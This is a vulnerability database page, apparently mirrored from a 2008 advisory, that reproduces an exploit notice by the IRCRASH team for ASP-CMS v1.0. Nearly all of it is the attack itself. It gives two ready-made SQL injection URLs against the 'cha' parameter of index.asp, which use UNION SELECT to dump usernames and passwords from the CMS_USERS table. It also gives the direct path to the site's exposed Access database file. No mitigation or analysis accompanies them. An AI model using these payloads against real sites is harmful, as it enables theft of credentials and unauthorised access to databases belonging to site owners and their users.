ASP-CMS v.1.0 Sql Injection/Database Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052336 漏洞类型
发布时间 2008-12-13 更新时间 2008-12-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120029
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 #####################################################################################
####              ASP-CMS v.1.0 Sql Injection/Database Disclosure                ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
#####################################################################################
#                                                                                   #
#Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip
#                                                                                   #
#DORK : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                 [Sql Injection]                                   #
#                                                                                   #
#Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                                   #
#Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS
#                                                                                   #
#####################################################################################
#                               [Database Disclosure]                               #
#                                                                                   #
#http://Site/[path]/mdb-database/ASP-CMS_v100.mdb                                   #
#                                                                                   #
#####################################################################################
#                           Site : http://IRCRASH.COM                               #
###################################### TNX GOD ######################################